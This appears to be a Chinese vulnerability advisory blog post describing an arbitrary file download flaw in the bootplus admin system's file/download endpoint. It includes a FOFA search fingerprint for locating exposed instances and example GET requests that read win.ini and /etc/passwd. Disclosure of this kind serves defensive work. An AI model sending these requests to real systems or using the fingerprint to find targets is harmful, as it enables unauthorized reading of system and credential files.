当前位置: 首页 > news >正文

bootplus管理系统 file/download 任意文件下载漏洞

news 来源:原创 2025/5/20 22:33:09

bootplus管理系统 file/download 任意文件下载漏洞

漏洞描述

        bootplus是基于SpringBoot + Shiro + MyBatisPlus的,拥有接口管理,权限管理,监控组件等功能的一体化权限管理框架。该项目中的file/download接口存在任意文件下载漏洞, 攻击者可以通过该漏洞下载查看目标系统的任意文件。

威胁等级: 高危

漏洞分类: 任意文件读取

涉及厂商及产品:bootplus

是否开源:是

应用指纹及检出思路

匹配源代码/statics/css/admin/AdminLTE.min.css 即可

fofa : body="/statics/css/admin/AdminLTE.min.css"

漏洞复现

GET /file/download?name=C://windows/win.ini&real=1 HTTP/1.1
Host: 127.0.0.1:8090 

GET /file/download?name=/etc/passwd&real=1

相关文章:

  • Python与R机器学习(1)支持向量机
  • AI技术未来趋势
  • 人工智能泡沫效应
  • mysql WITH的多种用法与示例
  • Day2:强化学习之TD learning
  • [特殊字符] 顺序容器全操作解析(含string完整版)
  • MySQL-SQL
  • ToDesk云电脑将终结显卡溢价,Web端浏览器、安卓、IOS免费试用
  • Ubuntu 24.04 安装 Redis
  • 什么是Docker多架构容器镜像
  • 云原生作业五
  • Python排序算法详解
  • 一键高清修复、智能剪辑,媒体处理还能多智能?
  • 什么是网关?网关有什么作用?API网关的主要功能,SpringCloud可以选择有哪些API网关?什么是限流算法?网关如何实现限流?一篇文章读懂网关的前世今生
  • 国产网络变压器有哪些品牌比较好
  • Record-Mode 备案免关站插件,让 WordPress 备案不影响 SEO 和收录
  • 网络安全-防御 第一次作业(由于防火墙只成功启动了一次未补截图)
  • redis之lua实现原理
  • 07:串口通信(二):收发数据包
  • Docker Desktop之Nginx
  • 锚定建设“中国樱桃第一县”目标,第六届澄城樱桃营销季启动
  • 上海发布台风红色预警?实为演练,今日下午局部中雨下班请注意
  • 浙江推动人工智能终端消费:家居机器人纳入以旧换新补贴范围
  • 北方将现今年首场大范围高温天气,山西河南山东陕西局地可超40℃
  • 媒体:中国女排前队长朱婷妹妹被保送浙大受质疑,多方回应
  • 江西3人拟提名为县(市、区)长候选人